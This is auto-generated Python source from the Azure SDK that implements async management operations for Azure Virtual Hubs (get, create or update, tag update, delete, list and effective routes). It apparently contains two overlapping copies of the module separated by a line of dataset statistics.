        :rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2020_06_01.models.VirtualHub]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.VirtualHub"]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
        # Only send the initial PUT when not resuming from a saved token.
        if cont_token is None:
            raw_result = await self._create_or_update_initial(
                resource_group_name=resource_group_name,
                virtual_hub_name=virtual_hub_name,
                virtual_hub_parameters=virtual_hub_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the final LRO response into the VirtualHub model.
            deserialized = self._deserialize('VirtualHub', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        # The final state is fetched via the Azure-AsyncOperation URL
        # (see lro_options below).
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}  # type: ignore
    async def update_tags(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        virtual_hub_parameters: "_models.TagsObject",
        **kwargs
    ) -> "_models.VirtualHub":
        """Updates VirtualHub tags.
        :param resource_group_name: The resource group name of the VirtualHub.
        :type resource_group_name: str
        :param virtual_hub_name: The name of the VirtualHub.
        :type virtual_hub_name: str
        :param virtual_hub_parameters: Parameters supplied to update VirtualHub tags.
        :type virtual_hub_parameters: ~azure.mgmt.network.v2020_06_01.models.TagsObject
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: VirtualHub, or the result of cls(response)
        :rtype: ~azure.mgmt.network.v2020_06_01.models.VirtualHub
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        # 'cls' optionally post-processes (pipeline_response, deserialized, headers).
        cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualHub"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Caller-supplied mappings override the defaults above.
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self.update_tags.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {} # type: Dict[str, Any]
        body_content = self._serialize.body(virtual_hub_parameters, 'TagsObject')
        body_content_kwargs['content'] = body_content
        # Tags are updated with a single PATCH request (no long-running operation).
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            # Translate well-known ARM status codes into typed exceptions first.
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualHub', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
    async def _delete_initial(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        **kwargs
    ) -> None:
        """Send the initial DELETE request of the delete long-running operation.

        Polling to completion is handled by ``begin_delete``; this call returns
        no deserialized body.
        """
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        # Construct URL
        url = self._delete_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Accepted success codes for an ARM delete (sync or async acceptance).
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    _delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
    async def begin_delete(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        **kwargs
    ) -> AsyncLROPoller[None]:
        """Deletes a VirtualHub.
        :param resource_group_name: The resource group name of the VirtualHub.
        :type resource_group_name: str
        :param virtual_hub_name: The name of the VirtualHub.
        :type virtual_hub_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            # No saved state: fire the initial request. cls=lambda hands back the
            # raw pipeline response so the poller can drive the operation from it.
            raw_result = await self._delete_initial(
                resource_group_name=resource_group_name,
                virtual_hub_name=virtual_hub_name,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Request-only kwargs must not be forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Delete produces no body; only honor the caller's 'cls' callback.
            if cls:
                return cls(pipeline_response, None, {})
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'} # type: ignore
    def list_by_resource_group(
        self,
        resource_group_name: str,
        **kwargs
    ) -> AsyncIterable["_models.ListVirtualHubsResult"]:
        """Lists all the VirtualHubs in a resource group.
        :param resource_group_name: The resource group name of the VirtualHub.
        :type resource_group_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListVirtualHubsResult or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVirtualHubsResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualHubsResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the request for one page of results.
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # First page: build the URL from the operation's URL template.
                # Construct URL
                url = self.list_by_resource_group.metadata['url'] # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # Subsequent pages: follow the server-provided next_link verbatim.
                url = next_link
                query_parameters = {} # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        async def extract_data(pipeline_response):
            # Deserialize one page; return (next_link, iterable of elements).
            deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs'} # type: ignore
    def list(
        self,
        **kwargs
    ) -> AsyncIterable["_models.ListVirtualHubsResult"]:
        """Lists all the VirtualHubs in a subscription.
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ListVirtualHubsResult or the result of cls(response)
        :rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2020_06_01.models.ListVirtualHubsResult]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None) # type: ClsType["_models.ListVirtualHubsResult"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        def prepare_request(next_link=None):
            # Build the request for one page of results.
            # Construct headers
            header_parameters = {} # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
            if not next_link:
                # First page: build the URL from the operation's URL template.
                # Construct URL
                url = self.list.metadata['url'] # type: ignore
                path_format_arguments = {
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {} # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # Subsequent pages: follow the server-provided next_link verbatim.
                url = next_link
                query_parameters = {} # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request
        async def extract_data(pipeline_response):
            # Deserialize one page; return (next_link, iterable of elements).
            deserialized = self._deserialize('ListVirtualHubsResult', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            request = prepare_request(next_link)
            pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(
            get_next, extract_data
        )
    list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/virtualHubs'} # type: ignore
    async def _get_effective_virtual_hub_routes_initial(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
        **kwargs
    ) -> None:
        """Send the initial POST of the get-effective-routes long-running operation.

        Polling to completion is handled by
        ``begin_get_effective_virtual_hub_routes``; this call returns no
        deserialized body.
        """
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Construct URL
        url = self._get_effective_virtual_hub_routes_initial.metadata['url'] # type: ignore
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        # Construct parameters
        query_parameters = {} # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        # Construct headers
        header_parameters = {} # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {} # type: Dict[str, Any]
        # The body is optional: serialize it only when parameters were supplied.
        if effective_routes_parameters is not None:
            body_content = self._serialize.body(effective_routes_parameters, 'EffectiveRoutesParameters')
        else:
            body_content = None
        body_content_kwargs['content'] = body_content
        request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 202]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
    _get_effective_virtual_hub_routes_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'} # type: ignore
    async def begin_get_effective_virtual_hub_routes(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        effective_routes_parameters: Optional["_models.EffectiveRoutesParameters"] = None,
        **kwargs
    ) -> AsyncLROPoller[None]:
        """Gets the effective routes configured for the Virtual Hub resource or the specified resource .
        :param resource_group_name: The resource group name of the VirtualHub.
        :type resource_group_name: str
        :param virtual_hub_name: The name of the VirtualHub.
        :type virtual_hub_name: str
        :param effective_routes_parameters: Parameters supplied to get the effective routes for a
         specific resource.
        :type effective_routes_parameters: ~azure.mgmt.network.v2020_06_01.models.EffectiveRoutesParameters
        :keyword callable cls: A custom type or function that will be passed the direct response
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
        :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
        :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
        :rtype: ~azure.core.polling.AsyncLROPoller[None]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
        cls = kwargs.pop('cls', None) # type: ClsType[None]
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
        if cont_token is None:
            # No saved state: fire the initial request. cls=lambda hands back the
            # raw pipeline response so the poller can drive the operation from it.
            raw_result = await self._get_effective_virtual_hub_routes_initial(
                resource_group_name=resource_group_name,
                virtual_hub_name=virtual_hub_name,
                effective_routes_parameters=effective_routes_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Request-only kwargs must not be forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # This LRO produces no body; only honor the caller's 'cls' callback.
            if cls:
                return cls(pipeline_response, None, {})
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_get_effective_virtual_hub_routes.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}/effectiveRoutes'} # type: ignore
| 49.944193 | 223 | 0.671156 |
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
# Signature of the optional 'cls' response-transform callback used throughout
# this module: it receives the pipeline response, the deserialized result, and
# a dict (passed as {} at the call sites below).
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualHubsOperations:
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
    async def get(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        **kwargs
    ) -> "_models.VirtualHub":
        """Retrieves the details of a VirtualHub.

        :param resource_group_name: The resource group name of the VirtualHub.
        :param virtual_hub_name: The name of the VirtualHub.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :return: VirtualHub, or the result of cls(response).
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 status.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        # Caller-supplied mappings override the defaults above.
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        # Build the URL from the operation's URL template.
        url = self.get.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            # Translate well-known ARM status codes into typed exceptions first.
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualHub', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
    async def _create_or_update_initial(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        virtual_hub_parameters: "_models.VirtualHub",
        **kwargs
    ) -> "_models.VirtualHub":
        """Send the initial PUT of the create-or-update long-running operation.

        Polling to completion is handled by ``begin_create_or_update``.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Build the URL from the operation's URL template.
        url = self._create_or_update_initial.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}
        body_content = self._serialize.body(virtual_hub_parameters, 'VirtualHub')
        body_content_kwargs['content'] = body_content
        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        # Both accepted statuses (200 and 201) carry a VirtualHub body.
        if response.status_code == 200:
            deserialized = self._deserialize('VirtualHub', pipeline_response)
        if response.status_code == 201:
            deserialized = self._deserialize('VirtualHub', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    _create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
    async def begin_create_or_update(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        virtual_hub_parameters: "_models.VirtualHub",
        **kwargs
    ) -> AsyncLROPoller["_models.VirtualHub"]:
        """Creates a VirtualHub resource if it doesn't exist, else updates the existing VirtualHub.

        :param resource_group_name: The resource group name of the VirtualHub.
        :param virtual_hub_name: The name of the VirtualHub.
        :param virtual_hub_parameters: Parameters supplied to create or update VirtualHub.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :keyword str continuation_token: A continuation token to restart a poller from a saved state.
        :keyword polling: True for ARMPolling, False for no polling, or a polling object.
        :keyword int polling_interval: Default wait between polls when no Retry-After header is present.
        :return: An AsyncLROPoller that returns either VirtualHub or the result of cls(response).
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        polling = kwargs.pop('polling', True)
        cls = kwargs.pop('cls', None)
        lro_delay = kwargs.pop(
            'polling_interval',
            self._config.polling_interval
        )
        cont_token = kwargs.pop('continuation_token', None)
        if cont_token is None:
            # No saved state: fire the initial PUT. cls=lambda hands back the raw
            # pipeline response so the poller can drive the operation from it.
            raw_result = await self._create_or_update_initial(
                resource_group_name=resource_group_name,
                virtual_hub_name=virtual_hub_name,
                virtual_hub_parameters=virtual_hub_parameters,
                cls=lambda x,y,z: x,
                **kwargs
            )
        # Request-only kwargs must not be forwarded to the polling method below.
        kwargs.pop('error_map', None)
        kwargs.pop('content_type', None)
        def get_long_running_output(pipeline_response):
            # Deserialize the terminal response into the resource model.
            deserialized = self._deserialize('VirtualHub', pipeline_response)
            if cls:
                return cls(pipeline_response, deserialized, {})
            return deserialized
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
        elif polling is False: polling_method = AsyncNoPolling()
        else: polling_method = polling
        if cont_token:
            return AsyncLROPoller.from_continuation_token(
                polling_method=polling_method,
                continuation_token=cont_token,
                client=self._client,
                deserialization_callback=get_long_running_output
            )
        else:
            return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
    begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
    async def update_tags(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        virtual_hub_parameters: "_models.TagsObject",
        **kwargs
    ) -> "_models.VirtualHub":
        """Updates VirtualHub tags with a single PATCH request (no LRO).

        :param resource_group_name: The resource group name of the VirtualHub.
        :param virtual_hub_name: The name of the VirtualHub.
        :param virtual_hub_parameters: Parameters supplied to update VirtualHub tags.
        :keyword callable cls: A custom type or function that will be passed the direct response.
        :return: VirtualHub, or the result of cls(response).
        :raises ~azure.core.exceptions.HttpResponseError: on any non-200 status.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"
        # Build the URL from the operation's URL template.
        url = self.update_tags.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        body_content_kwargs = {}
        body_content = self._serialize.body(virtual_hub_parameters, 'TagsObject')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        deserialized = self._deserialize('VirtualHub', pipeline_response)
        if cls:
            return cls(pipeline_response, deserialized, {})
        return deserialized
    update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualHubs/{virtualHubName}'}
    async def _delete_initial(
        self,
        resource_group_name: str,
        virtual_hub_name: str,
        **kwargs
    ) -> None:
        """Send the initial DELETE request of the delete long-running operation.

        Polling to completion is handled by ``begin_delete``; this call returns
        no deserialized body.
        """
        cls = kwargs.pop('cls', None)
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-01"
        accept = "application/json"
        # Build the URL from the operation's URL template.
        url = self._delete_initial.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
            'virtualHubName': self._serialize.url("virtual_hub_name", virtual_hub_name, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
        header_parameters = {}
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response
        # Accepted success codes for an ARM delete (sync or async acceptance).
        if response.status_code not in [200, 202, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)
        if cls:
            return cls(pipeline_response, None, {})
